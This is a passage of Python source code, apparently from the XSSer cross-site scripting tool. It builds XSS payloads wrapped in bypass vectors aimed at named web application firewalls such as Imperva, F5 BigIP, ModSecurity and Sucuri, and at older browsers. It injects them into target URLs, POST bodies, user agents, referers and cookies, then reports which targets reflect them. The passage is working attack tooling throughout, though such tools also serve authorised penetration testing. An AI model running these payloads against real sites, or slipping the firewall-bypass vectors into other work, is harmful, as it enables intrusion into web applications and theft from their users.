  621. payload_string = 32*payload_string + payload_string
  622. # PHPIDS (>0.7) [ALL] -> payload: 'svg-onload' (23/04/2016)
  623. if options.phpids070:
  624. payload_string = '<svg+onload=+"'+payload_string+'">'
  625. # Imperva Incapsula [ALL] -> payload: 'img onerror' + payload[DoubleURL+HTML+Unicode] 18/02/2016
  626. if options.imperva:
  627. payload_string = '<img src=x onerror="'+payload_string+'">'
  628. # WebKnight (>4.1) [Chrome] payload: 'details ontoggle' 18/02/2016
  629. if options.webknight:
  630. payload_string = '<details ontoggle='+payload_string+'>'
  631. # F5BigIP [Chrome+FF+Opera] payload: 'onwheel' 18/02/2016
  632. if options.f5bigip:
  633. payload_string = '<body style="height:1000px" onwheel="'+payload_string+'">'
  634. # Barracuda WAF [ALL] payload: 'onwheel' 18/02/2016
  635. if options.barracuda:
  636. payload_string = '<body style="height:1000px" onwheel="'+payload_string+'">'
  637. # Apache / modsec [ALL] payload: special 18/02/2016
  638. if options.modsec:
  639. payload_string = '<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover='+payload_string+'>'
  640. # QuickDefense [Chrome] payload: 'ontoggle' + payload[Unicode] 18/02/2016
  641. if options.quickdefense:
  642. payload_string = '<details ontoggle="'+payload_string+'">'
  643. # SucuriWAF [ALL] payload: 'ontoggle' + payload[Unicode] 18/02/2016
  644. if options.sucuri:
  645. payload_string = '<a+id="a"href=javascript%26colon;alert%26lpar;'+payload_string+'%26rpar;+id="a" style=width:100%25;height:100%25;position:fixed;left:0;top:0 x>Y</a>'
  646. # Firefox 12 (and below) # 09/2019
  647. if options.firefox:
  648. payload_string = "<script type ='text/javascript'>"+payload_string+"</script>"
  649. # Chrome 19 (and below, but also Firefox 12 and below) # 09/2019
  650. if options.chrome:
  651. payload_string = "<script>/*///*/"+payload_string+"</script>"
  652. # Internet Explorer 9 (but also Firefox 12 and below) # 09/2019
  653. if options.iexplorer:
  654. payload_string = 'cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body><script>'+payload_string+'</script></body></html>'
  655. # Opera 10.6 (but also IE6) # 09/2019
  656. if options.opera:
  657. payload_string = "<Table background = javascript: alert ("+payload_string+")> </ table>"
  658. # Substitute the attacking hash
  659. if 'PAYLOAD' in payload_string or 'VECTOR' in payload_string:
  660. payload_string = payload_string.replace('PAYLOAD', self.DEFAULT_XSS_PAYLOAD)
  661. payload_string = payload_string.replace('VECTOR', self.DEFAULT_XSS_PAYLOAD)
  662. hashed_payload = payload_string
  663. # Imperva
  664. if options.imperva:
  665. hashed_payload = urllib.parse.urlencode({'':hashed_payload})
  666. hashed_payload = urllib.parse.urlencode({'':hashed_payload}) #DoubleURL encoding
  667. hashed_payload = cgi.escape(hashed_payload) # + HTML encoding
  668. hashed_payload = str(hashed_payload) # + Unicode
  669. # Quick Defense
  670. if options.quickdefense:
  671. hashed_payload = str(hashed_payload) # + Unicode
  672. # apply user final attack url payload
  673. if user_attack_payload:
  674. hashed_vector_url = self.encoding_permutations(user_attack_payload)
  675. else:
  676. hashed_vector_url = self.encoding_permutations(hashed_payload)
  677. # replace special payload string also for extra attacks
  678. if self.extra_hashed_injections:
  679. hashed_payload = hashed_payload.replace('XSS', 'PAYLOAD')
  680. for k, v in self.extra_hashed_injections.items():
  681. if v[1] in hashed_payload:
  682. self.extra_hashed_vector_url[k] = v[0], hashed_payload
  683. self.extra_hashed_injections = self.extra_hashed_vector_url
  684. if not options.getdata: # using GET as a single input (-u)
  685. target_url = url
  686. else:
  687. if not url.endswith("/") and not options.getdata.startswith("/"):
  688. url = url + "/"
  689. target_url = url + options.getdata
  690. p_uri = urlparse(target_url)
  691. uri = p_uri.netloc
  692. path = p_uri.path
  693. if not uri.endswith('/') and not path.startswith('/'):
  694. uri = uri + "/"
  695. if self.options.target or self.options.crawling: # for audit entire target allows target without 'XSS/X1S' keyword
  696. if not "XSS" in target_url:
  697. if not target_url.endswith("/"):
  698. target_url = target_url + "/XSS"
  699. else:
  700. target_url = target_url + "XSS"
  701. target_params = parse_qs(urlparse(target_url).query, keep_blank_values=True)
  702. if self.options.script:
  703. if not 'XSS' in self.options.script and not self.options.crawling: # 'XSS' keyword used to change PAYLOAD at target_params
  704. self.not_keyword_exit()
  705. if not target_params and not options.postdata:
  706. if not self.options.xsa and not self.options.xsr and not self.options.coo: # extra attacks payloads
  707. if not 'XSS' in target_url and not 'X1S' in target_url and not self.options.crawling: # not any payloader found!
  708. self.not_keyword_exit()
  709. else: # keyword found at target url (ex: https://target.com/XSS)
  710. if 'XSS' in target_url:
  711. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  712. elif 'X1S' in target_url:
  713. url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
  714. hashed_payload = payload_string.replace('XSS', url_orig_hash)
  715. if "[B64]" in hashed_payload: # [DCP Injection]
  716. dcp_payload = hashed_payload.split("[B64]")[1]
  717. dcp_preload = hashed_payload.split("[B64]")[0]
  718. dcp_payload = b64encode(dcp_payload)
  719. hashed_payload = dcp_preload + dcp_payload
  720. self.hashed_injections[url_orig_hash] = target_url
  721. if user_attack_payload:
  722. pass
  723. else:
  724. hashed_vector_url = self.encoding_permutations(hashed_payload)
  725. target_params[''] = hashed_vector_url # special target_param when XSS only at target_url
  726. target_url_params = urllib.parse.urlencode(target_params)
  727. if not uri.endswith('/') and not path.startswith('/'):
  728. uri = uri + "/"
  729. dest_url = p_uri.scheme + "://" + uri + path
  730. if not "XSS" in dest_url:
  731. if not dest_url.endswith("/"):
  732. dest_url = dest_url + "/" + hashed_vector_url
  733. else:
  734. dest_url = dest_url + hashed_vector_url
  735. else:
  736. if 'XSS' in dest_url:
  737. dest_url = dest_url.replace('XSS', hashed_vector_url)
  738. if 'X1S' in dest_url:
  739. dest_url = dest_url.replace('X1S', hashed_vector_url)
  740. else:
  741. if 'XSS' in target_url:
  742. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  743. elif 'X1S' in target_url:
  744. url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
  745. hashed_payload = payload_string.replace('XSS', url_orig_hash)
  746. if "[B64]" in hashed_payload: # [DCP Injection]
  747. dcp_payload = hashed_payload.split("[B64]")[1]
  748. dcp_preload = hashed_payload.split("[B64]")[0]
  749. dcp_payload = b64encode(dcp_payload)
  750. hashed_payload = dcp_preload + dcp_payload
  751. self.hashed_injections[url_orig_hash] = target_url
  752. if user_attack_payload:
  753. pass
  754. else:
  755. hashed_vector_url = self.encoding_permutations(hashed_payload)
  756. target_params[''] = hashed_vector_url # special target_param when XSS only at target_url
  757. target_url_params = urllib.parse.urlencode(target_params)
  758. if not uri.endswith('/') and not path.startswith('/'):
  759. uri = uri + "/"
  760. dest_url = p_uri.scheme + "://" + uri + path
  761. if 'XSS' in dest_url:
  762. dest_url = dest_url.replace('XSS', hashed_vector_url)
  763. if 'X1S' in dest_url:
  764. dest_url = dest_url.replace('X1S', hashed_vector_url)
  765. dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  766. else:
  767. if not options.postdata:
  768. r = 0
  769. for key, value in target_params.items(): # parse params searching for keywords
  770. for v in value:
  771. if v == 'XSS' or v == 'X1S': # user input keywords where inject a payload
  772. if v == 'XSS':
  773. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  774. elif v == 'X1S':
  775. url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
  776. hashed_payload = payload_string.replace('XSS', url_orig_hash)
  777. if "[B64]" in hashed_payload: # [DCP Injection]
  778. dcp_payload = hashed_payload.split("[B64]")[1]
  779. dcp_preload = hashed_payload.split("[B64]")[0]
  780. dcp_payload = b64encode(dcp_payload)
  781. hashed_payload = dcp_preload + dcp_payload
  782. self.hashed_injections[url_orig_hash] = key
  783. if user_attack_payload:
  784. pass
  785. else:
  786. hashed_vector_url = self.encoding_permutations(hashed_payload)
  787. target_params[key] = hashed_vector_url
  788. r = r + 1
  789. else:
  790. if self.options.xsa or self.options.xsr or self.options.coo:
  791. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  792. self.hashed_injections[url_orig_hash] = key
  793. target_params[key] = v
  794. r = r + 1
  795. else:
  796. target_params[key] = v
  797. if r == 0 and not self.options.xsa and not self.options.xsr and not self.options.coo and not self.options.crawling:
  798. self.not_keyword_exit()
  799. payload_url = query_string.strip() + hashed_vector_url
  800. target_url_params = urllib.parse.urlencode(target_params)
  801. dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  802. else: # using POST provided by parameter (-p)
  803. target_params = parse_qs(query_string, keep_blank_values=True)
  804. r = 0
  805. for key, value in target_params.items(): # parse params searching for keywords
  806. for v in value:
  807. if v == 'XSS' or v == 'X1S': # user input keywords where inject a payload
  808. if v == 'XSS':
  809. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  810. elif v == 'X1S':
  811. url_orig_hash = self.generate_numeric_hash() # new hash for each parameter with an injection
  812. hashed_payload = payload_string.replace('XSS', url_orig_hash)
  813. if "[B64]" in hashed_payload: # [DCP Injection]
  814. dcp_payload = hashed_payload.split("[B64]")[1]
  815. dcp_preload = hashed_payload.split("[B64]")[0]
  816. dcp_payload = b64encode(dcp_payload)
  817. hashed_payload = dcp_preload + dcp_payload
  818. self.hashed_injections[url_orig_hash] = key
  819. if user_attack_payload:
  820. pass
  821. else:
  822. hashed_vector_url = self.encoding_permutations(hashed_payload)
  823. target_params[key] = hashed_vector_url
  824. r = r + 1
  825. else:
  826. if self.options.xsa or self.options.xsr or self.options.coo:
  827. url_orig_hash = self.generate_hash('url') # new hash for each parameter with an injection
  828. self.hashed_injections[url_orig_hash] = key
  829. target_params[key] = v
  830. r = r + 1
  831. else:
  832. target_params[key] = v
  833. if r == 0 and not self.options.xsa and not self.options.xsr and not self.options.coo and not self.options.crawling:
  834. self.not_keyword_exit()
  835. target_url_params = urllib.parse.urlencode(target_params)
  836. dest_url = target_url_params
  837. self._ongoing_attacks['url'] = url_orig_hash
  838. return dest_url, agent, referer, cookie
  839. def attack_url_payload(self, url, payload, query_string):
  840. if not self.pool:
  841. pool = self.mothership.pool
  842. else:
  843. pool = self.pool
  844. c = Curl()
  845. if self.options.getdata or not self.options.postdata:
  846. dest_url, agent, referer, cookie = self.get_url_payload(url, payload, query_string, None)
  847. def _cb(request, result):
  848. self.finish_attack_url_payload(c, request, result, payload,
  849. query_string, url, dest_url)
  850. _error_cb = self.error_attack_url_payload
  851. def _error_cb(request, error):
  852. self.error_attack_url_payload(c, url, request, error)
  853. c.agent = agent
  854. c.referer = referer
  855. c.cookie = cookie
  856. if " " in dest_url: # parse blank spaces
  857. dest_url = dest_url.replace(" ", "+")
  858. pool.addRequest(c.get, [[dest_url]], _cb, _error_cb)
  859. self._ongoing_requests += 1
  860. if self.options.postdata:
  861. dest_url, agent, referer, cookie = self.get_url_payload("", payload, query_string, None)
  862. def _cb(request, result):
  863. self.finish_attack_url_payload(c, request, result, payload,
  864. query_string, url, dest_url)
  865. _error_cb = self.error_attack_url_payload
  866. def _error_cb(request, error):
  867. self.error_attack_url_payload(c, url, request, error)
  868. dest_url = dest_url.strip().replace("/", "", 1)
  869. c.agent = agent
  870. c.referer = referer
  871. c.cookie = cookie
  872. pool.addRequest(c.post, [[url, dest_url]], _cb, _error_cb)
  873. self._ongoing_requests += 1
  874. def error_attack_url_payload(self, c, url, request, error):
  875. self._ongoing_requests -= 1
  876. for reporter in self._reporters:
  877. reporter.mosquito_crashed(url, str(error[0]))
  878. dest_url = request.args[0]
  879. self.report("Failed attempt (URL Malformed!?): " + url + "\n")
  880. self.urlmalformed = True
  881. if self.urlmalformed == True and self.urlspoll[0] == url:
  882. self.land()
  883. self.report(str(error[0]))
  884. if self.options.verbose:
  885. traceback.print_tb(error[2])
  886. c.close()
  887. del c
  888. return
  889. def finish_attack_url_payload(self, c, request, result, payload,
  890. query_string, url, dest_url):
  891. self.round_complete = self.round_complete + 1
  892. self.report("="*75)
  893. self.report("[*] Test: [ "+str(self.round_complete)+"/"+str(self.rounds)+" ] <-> "+str(self.time))
  894. self.report("="*75)
  895. self.report("\n[+] Target: \n\n [ "+ str(url) + " ]\n")
  896. self._ongoing_requests -= 1
  897. # adding constant head check number flag
  898. if self.options.isalive:
  899. self.flag_isalive_num = int(self.options.isalive)
  900. if not self.options.isalive:
  901. pass
  902. elif self.options.isalive and not self.options.nohead:
  903. self.errors_isalive = self.errors_isalive + 1
  904. if self.errors_isalive > self.options.isalive:
  905. pass
  906. else:
  907. self.report("---------------------")
  908. self.report("Alive Checker for: " + url + " - [", self.errors_isalive, "/", self.options.isalive, "]\n")
  909. if self.next_isalive == True:
  910. hc = Curl()
  911. self.next_isalive = False
  912. try:
  913. urls = hc.do_head_check([url])
  914. except:
  915. print("[Error] Target url: (" + url + ") is unaccesible!" + " [DISCARDED]" + "\n")
  916. self.errors_isalive = 0
  917. return
  918. if str(hc.info()["http-code"]) in ["200", "302", "301", "401"]:
  919. print("HEAD alive check: OK" + "(" + hc.info()["http-code"] + ")\n")
  920. print("- Your target still Alive: " + "(" + url + ")")
  921. print("- If you are receiving continuous 404 errors requests on your injections but your target is alive is because:\n")
  922. print(" - your injections are failing: normal :-)")
  923. print(" - maybe exists some IPS/NIDS/... systems blocking your requests!\n")
  924. else:
  925. if str(hc.info()["http-code"]) == "0":
  926. print("\n[Error] Target url: (" + url + ") is unaccesible!" + " [DISCARDED]" + "\n")
  927. else:
  928. print("HEAD alive check: FAILED" + "(" + hc.info()["http-code"] + ")\n")
  929. print("- Your target " + "(" + url + ")" + " looks that is NOT alive")
  930. print("- If you are receiving continuous 404 errors requests on payloads\n and this HEAD pre-check request is giving you another 404\n maybe is because; target is down, url malformed, something is blocking you...\n- If you haven't more than one target then try to; STOP THIS TEST!!\n")
  931. self.errors_isalive = 0
  932. else:
  933. if str(self.errors_isalive) >= str(self.options.isalive):
  934. self.report("---------------------")
  935. self.report("\nAlive System: XSSer is checking if your target still alive. [Waiting for reply...]\n")
  936. self.next_isalive = True
  937. self.options.isalive = self.flag_isalive_num
  938. else:
  939. if self.options.isalive and self.options.nohead:
  940. self.report("---------------------")
  941. self.report("Alive System DISABLED!: XSSer is using a pre-check HEAD request per target by default to perform better accurance on tests\nIt will check if target is alive before inject all the payloads. try (--no-head) with (--alive <num>) to control this checker limit manually")
  942. self.report("---------------------")
  943. # check results an alternative url, choosing method and parameters, or not
  944. if self.options.altm == None or self.options.altm not in ["GET", "POST", "post"]:
  945. self.options.altm = "GET"
  946. if self.options.altm == "post":
  947. self.options.altm = "POST"
  948. if self.options.alt == None:
  949. pass
  950. else:
  951. self.report("="*45)
  952. self.report("[+] Checking Response Options:", "\n")
  953. self.report("[+] Url:", self.options.alt)
  954. self.report("[-] Method:", self.options.altm)
  955. if self.options.ald:
  956. self.report("[-] Parameter(s):", self.options.ald, "\n")
  957. else:
  958. self.report("[-] Parameter(s):", query_string, "\n")
  959. if c.info()["http-code"] in ["200", "302", "301"]:
  960. if self.options.statistics:
  961. self.success_connection = self.success_connection + 1
  962. self._report_attack_success(c, dest_url, payload,
  963. query_string, url)
  964. else:
  965. self._report_attack_failure(c, dest_url, payload,
  966. query_string, url)
  967. # checking response results
  968. if self.options.alt == None:
  969. pass
  970. else:
  971. self.report("="*45)
  972. self.report("[+] Checking Response Results:", "\n")
  973. self.report("Searching using", self.options.altm, "for:", orig_hash, "on alternative url")
  974. if 'PAYLOAD' in payload['payload']:
  975. user_attack_payload = payload['payload'].replace('PAYLOAD', orig_hash)
  976. if self.options.ald:
  977. query_string = self.options.ald
  978. if "VECTOR" in self.options.alt:
  979. dest_url = self.options.alt
  980. else:
  981. if not dest_url.endswith("/"):
  982. dest_url = dest_url + "/"
  983. if self.options.altm == 'POST':
  984. dest_url = "" + query_string + user_attack_payload
  985. dest_url = dest_url.strip().replace("/", "", 1)
  986. data = c.post(url, dest_url)
  987. else:
  988. dest_url = self.options.alt + query_string + user_attack_payload
  989. c.get(dest_url)
  990. # perform check response injection
  991. if c.info()["http-code"] in ["200", "302", "301"]:
  992. if self.options.statistics:
  993. self.success_connection = self.success_connection + 1
  994. self._report_attack_success(c, dest_url, payload,
  995. query_string, url)
  996. else:
  997. self._report_attack_failure(c, dest_url, payload,
  998. query_string, url)
  999. c.close()
  1000. del c
  1001. def encoding_permutations(self, enpayload_url):
  1002. """
  1003. perform encoding permutations on the url and query_string.
  1004. """
  1005. options = self.options
  1006. if options.Cem:
  1007. enc_perm = options.Cem.split(",")
  1008. for _enc in enc_perm:
  1009. enpayload_url = self.encmap[_enc](enpayload_url)
  1010. else:
  1011. for enctype in list(self.encmap.keys()):
  1012. if getattr(options, enctype):
  1013. enpayload_url = self.encmap[enctype](enpayload_url)
  1014. return enpayload_url
  1015. def _report_attack_success(self, curl_handle, dest_url, payload,\
  1016. query_string, orig_url):
  1017. """
  1018. report connection success of an attack
  1019. """
  1020. if not orig_url in self.successful_urls:
  1021. self.successful_urls.append(orig_url)
  1022. options = self.options
  1023. current_hashes = [] # to check for ongoing hashes
  1024. if payload['browser'] == "[Heuristic test]":
  1025. for key, value in self.hashed_injections.items():
  1026. if str(key) in dest_url:
  1027. if key not in current_hashes:
  1028. self.final_hashes[key] = value
  1029. current_hashes.append(key)
  1030. elif self.options.hash:
  1031. for key, value in self.hashed_injections.items():
  1032. self.final_hashes[key] = value
  1033. current_hashes.append(key)
  1034. else:
  1035. self.report("-"*45)
  1036. self.report("\n[!] Hashing: \n")
  1037. for key, value in self.hashed_injections.items():
  1038. if str(key) in dest_url:
  1039. if key not in current_hashes:
  1040. self.report(" [ " +key+" ] : [" , value + " ]")
  1041. self.final_hashes[key] = value
  1042. current_hashes.append(key)
  1043. else:
  1044. if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
  1045. b64_string = payload["payload"].split("[B64]")
  1046. b64_string = b64_string[1]
  1047. b64_string = b64_string.replace('PAYLOAD', key)
  1048. b64_string = b64encode(b64_string)
  1049. b64_string = urllib.parse.urlencode({'':b64_string})
  1050. if b64_string.startswith("="):
  1051. b64_string = b64_string.replace("=", "")
  1052. if str(b64_string) in str(dest_url):
  1053. if key not in current_hashes:
  1054. self.report(" [ " +key+" ] : [" , value + " ]")
  1055. self.final_hashes[key] = value
  1056. current_hashes.append(key)
  1057. else: # when using encoders (Str, Hex, Dec...)
  1058. payload_string = payload["payload"].replace("PAYLOAD", key)
  1059. hashed_payload = self.encoding_permutations(payload_string)
  1060. if self.options.Cem:
  1061. enc_perm = options.Cem.split(",")
  1062. for e in enc_perm:
  1063. hashed_payload = self.encoding_permutations(payload_string)
  1064. if e == "Str":
  1065. hashed_payload = hashed_payload.replace(",", "%2C")
  1066. if e == "Mix":
  1067. hashed_payload=urllib.parse.quote(hashed_payload)
  1068. if e == "Dec":
  1069. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1070. if e == "Hex":
  1071. hashed_payload = hashed_payload.replace("%", "%25")
  1072. if e == "Hes":
  1073. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1074. hashed_payload = hashed_payload.replace(";", "%3B")
  1075. else:
  1076. if self.options.Str:
  1077. hashed_payload = hashed_payload.replace(",", "%2C")
  1078. if self.options.Mix:
  1079. hashed_payload=urllib.parse.quote(hashed_payload)
  1080. if self.options.Dec:
  1081. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1082. if self.options.Hex:
  1083. hashed_payload = hashed_payload.replace("%", "%25")
  1084. if self.options.Hes:
  1085. hashed_payload = hashed_payload.replace("&#", "%26%23")
  1086. hashed_payload = hashed_payload.replace(";", "%3B")
  1087. if str(hashed_payload) in str(dest_url):
  1088. if key not in current_hashes:
  1089. self.report(" [ " +key+" ] : [" , value + " ]")
  1090. self.final_hashes[key] = value
  1091. if self.extra_hashed_injections:
  1092. for k, v in self.extra_hashed_injections.items():
  1093. payload_url = str(v[1])
  1094. if payload_url == payload["payload"]:
  1095. if k not in current_hashes:
  1096. self.report(" [ " +k+" ] : [" , v[0] + " ]")
  1097. self.final_hashes[k] = v[0]
  1098. current_hashes.append(k)
  1099. self.report("\n"+"-"*45+"\n")
  1100. if payload['browser'] == "[Heuristic test]":
  1101. self.report("[+] Checking: " + str(payload['payload']).strip('XSS'), "\n")
  1102. else:
  1103. if self.extra_hashed_injections:
  1104. extra_attacks=[]
  1105. if options.xsa:
  1106. extra_attacks.append("XSA")
  1107. if options.xsr:
  1108. extra_attacks.append("XSR")
  1109. if options.coo:
  1110. extra_attacks.append("COO")
  1111. if extra_attacks:
  1112. extra_attacks = "+ "+ str(extra_attacks)
  1113. if options.postdata:
  1114. self.report("[*] Trying: " + extra_attacks + "\n\n" + orig_url.strip(), "(POST:", query_string + ") \n")
  1115. else:
  1116. self.report("[*] Trying: " + extra_attacks + "\n\n" + dest_url.strip()+"\n")
  1117. else:
  1118. if options.postdata:
  1119. self.report("[*] Trying: \n\n" + orig_url.strip(), "(POST:", query_string + ")\n")
  1120. else:
  1121. self.report("[*] Trying: \n\n" + dest_url.strip() + "\n")
  1122. if not self.options.hash and not self.options.script:
  1123. if not "XSS" in dest_url or not "X1S" in dest_url and self.options.xsa or self.options.xsr or self.options.coo:
  1124. pass
  1125. else:
  1126. self.report("-"*45)
  1127. if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
  1128. pass
  1129. else:
  1130. if not "XSS" in dest_url or not "X1S" in dest_url:
  1131. if self.options.xsa or self.options.xsr or self.options.coo:
  1132. pass
  1133. else:
  1134. self.report("-"*45)
  1135. self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
  1136. if not self.options.verbose:
  1137. self.report("-"*45 + "\n")
  1138. else:
  1139. self.report("-"*45)
  1140. self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
  1141. if not self.options.verbose:
  1142. self.report("-"*45 + "\n")
  1143. # statistics injections counters
  1144. if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
  1145. self.check_positives = self.check_positives + 1
  1146. elif payload['browser']=="[Data Control Protocol Injection]":
  1147. self.dcp_injection = self.dcp_injection + 1
  1148. elif payload['browser']=="[Document Object Model Injection]":
  1149. self.dom_injection = self.dom_injection + 1
  1150. elif payload['browser']=="[Induced Injection]":
  1151. self.httpsr_injection = self.httpsr_injection + 1
  1152. elif payload['browser']=="[manual_injection]":
  1153. self.manual_injection = self.manual_injection + 1
  1154. else:
  1155. self.auto_injection = self.auto_injection +1
  1156. if not self.hashed_injections:
  1157. for k, v in self.extra_hashed_injections.items():
  1158. if k in current_hashes:
  1159. if v[0] == "XSA":
  1160. agent = v[1]
  1161. agent = agent.replace("PAYLOAD", k)
  1162. Curl.agent = agent
  1163. if v[0] == "XSR":
  1164. referer = v[1]
  1165. referer = referer.replace("PAYLOAD", k)
  1166. Curl.referer = referer
  1167. if v[0] == "COO":
  1168. cookie = v[1]
  1169. cookie = cookie.replace("PAYLOAD", k)
  1170. Curl.cookie = cookie
  1171. else:
  1172. for key, value in self.hashed_injections.items():
  1173. for k, v in self.extra_hashed_injections.items():
  1174. payload_url = v[1]
  1175. payload_url = payload_url.replace("PAYLOAD",key)
  1176. payload_url = payload_url.replace(" ", "+") # black magic!
  1177. final_dest_url = str(urllib.parse.unquote(dest_url.strip()))
  1178. if payload_url in final_dest_url:
  1179. if v[0] == "XSA":
  1180. agent = v[1]
  1181. agent = agent.replace("PAYLOAD", k)
  1182. Curl.agent = agent
  1183. if v[0] == "XSR":
  1184. referer = v[1]
  1185. referer = referer.replace("PAYLOAD", k)
  1186. Curl.referer = referer
  1187. if v[0] == "COO":
  1188. cookie = v[1]
  1189. cookie = cookie.replace("PAYLOAD", k)
  1190. Curl.cookie = cookie
  1191. else:
  1192. if k in current_hashes:
  1193. if v[0] == "XSA":
  1194. agent = v[1]
  1195. agent = agent.replace("PAYLOAD", k)
  1196. Curl.agent = agent
  1197. if v[0] == "XSR":
  1198. referer = v[1]
  1199. referer = referer.replace("PAYLOAD", k)
  1200. Curl.referer = referer
  1201. if v[0] == "COO":
  1202. cookie = v[1]
  1203. cookie = cookie.replace("PAYLOAD", k)
  1204. Curl.cookie = cookie
  1205. if options.verbose:
  1206. self.report("-"*45)
  1207. self.report("\n[+] HTTP Headers Verbose:\n")
  1208. self.report(" [Client Request]")
  1209. Curl.print_options()
  1210. self.report(" [Server Reply]\n")
  1211. self.report(curl_handle.info())
  1212. self.report("="*45)
  1213. self.report("[*] Injection(s) Results:")
  1214. self.report("="*45 + "\n")
  1215. if payload['browser']=="[Heuristic test]":
  1216. for key, value in self.final_hashes.items():
  1217. if str(key) in dest_url:
  1218. heuristic_string = key
  1219. heuristic_param = str(payload['payload']).strip('XSS')
  1220. # checking heuristic responses
  1221. if heuristic_string in curl_handle.body():
  1222. # ascii
  1223. if heuristic_param == "\\":
  1224. self.heuris_backslash_found = self.heuris_backslash_found + 1
  1225. # / same as ASCII and Unicode
  1226. elif heuristic_param == "/":
  1227. self.heuris_slash_found = self.heuris_slash_found + 1
  1228. self.heuris_une_slash_found = self.heuris_une_slash_found + 1
  1229. elif heuristic_param == ">":
  1230. self.heuris_mayor_found = self.heuris_mayor_found + 1
  1231. elif heuristic_param == "<":
  1232. self.heuris_minor_found = self.heuris_minor_found + 1
  1233. elif heuristic_param == ";":
  1234. self.heuris_semicolon_found = self.heuris_semicolon_found + 1
  1235. elif heuristic_param == "'":
  1236. self.heuris_colon_found = self.heuris_colon_found + 1
  1237. elif heuristic_param == '"':
  1238. self.heuris_doublecolon_found = self.heuris_doublecolon_found + 1
  1239. elif heuristic_param == "=":
  1240. self.heuris_equal_found = self.heuris_equal_found + 1
  1241. # une
  1242. elif heuristic_param == "%5C":
  1243. self.heuris_une_backslash_found = self.heuris_une_backslash_found + 1
  1244. elif heuristic_param == "%3E":
  1245. self.heuris_une_mayor_found = self.heuris_une_mayor_found + 1
  1246. elif heuristic_param == "%3C":
  1247. self.heuris_une_minor_found = self.heuris_une_minor_found + 1
  1248. elif heuristic_param == "%3B":
  1249. self.heuris_une_semicolon_found = self.heuris_une_semicolon_found + 1
  1250. elif heuristic_param == "%27":
  1251. self.heuris_une_colon_found = self.heuris_une_colon_found + 1
  1252. elif heuristic_param == "%22":
  1253. self.heuris_une_doublecolon_found = self.heuris_une_doublecolon_found + 1
  1254. elif heuristic_param == "%3D":
  1255. self.heuris_une_equal_found = self.heuris_une_equal_found + 1
  1256. # dec
  1257. elif heuristic_param == "&#92":
  1258. self.heuris_dec_backslash_found = self.heuris_dec_backslash_found + 1
  1259. elif heuristic_param == "&#47":
  1260. self.heuris_dec_slash_found = self.heuris_dec_slash_found + 1
  1261. elif heuristic_param == "&#62":
  1262. self.heuris_dec_mayor_found = self.heuris_dec_mayor_found + 1
  1263. elif heuristic_param == "&#60":
  1264. self.heuris_dec_minor_found = self.heuris_dec_minor_found + 1
  1265. elif heuristic_param == "&#59":
  1266. self.heuris_dec_semicolon_found = self.heuris_dec_semicolon_found + 1
  1267. elif heuristic_param == "&#39":
  1268. self.heuris_dec_colon_found = self.heuris_dec_colon_found + 1
  1269. elif heuristic_param == "&#34":
  1270. self.heuris_dec_doublecolon_found = self.heuris_dec_doublecolon_found + 1
  1271. elif heuristic_param == "&#61":
  1272. self.heuris_dec_equal_found = self.heuris_dec_equal_found + 1
  1273. self.add_success(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # success!
  1274. else:
  1275. if heuristic_param == "\\":
  1276. self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1
  1277. elif heuristic_param == "/":
  1278. self.heuris_slash_notfound = self.heuris_slash_notfound + 1
  1279. elif heuristic_param == ">":
  1280. self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1
  1281. elif heuristic_param == "<":
  1282. self.heuris_minor_notfound = self.heuris_minor_notfound + 1
  1283. elif heuristic_param == ";":
  1284. self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1
  1285. elif heuristic_param == "'":
  1286. self.heuris_colon_notfound = self.heuris_colon_notfound + 1
  1287. elif heuristic_param == '"':
  1288. self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1
  1289. elif heuristic_param == "=":
  1290. self.heuris_equal_notfound = self.heuris_equal_notfound + 1
  1291. self.add_failure(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # heuristic fail
  1292. elif self.options.hash:
  1293. for key, value in self.final_hashes.items():
  1294. if str(key) in dest_url:
  1295. if key in curl_handle.body():
  1296. self.add_success(dest_url, key, value, query_string, orig_url, 'hashing check') # success!
  1297. else:
  1298. self.add_failure(dest_url, key, value, query_string, orig_url, 'hashing check') # hashing_check fail
  1299. else:
  1300. for key, value in self.final_hashes.items():
  1301. if key in current_hashes:
  1302. if "XSA" in value:
  1303. method = "XSA"
  1304. hashing = key
  1305. elif "XSR" in value:
  1306. method = "XSR"
  1307. hashing = key
  1308. elif "COO" in value:
  1309. method = "COO"
  1310. hashing = key
  1311. else:
  1312. method = value
  1313. hashing = key
  1314. if not hashing:
  1315. pass
  1316. else:
  1317. if hashing not in dest_url:
  1318. if key in current_hashes:
  1319. if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
  1320. b64_string = payload["payload"].split("[B64]")
  1321. b64_string = b64_string[1]
  1322. b64_string = b64_string.replace('PAYLOAD', key)
  1323. b64_string = b64encode(b64_string)
  1324. b64_string = urllib.parse.urlencode({'':b64_string})
  1325. if b64_string.startswith("="):
  1326. b64_string = b64_string.replace("=", "")
  1327. if str(b64_string) in str(dest_url):
  1328. self.check_hash_on_target(hashing, dest_url, orig_url, payload, query_string, method, curl_handle)
  1329. else:
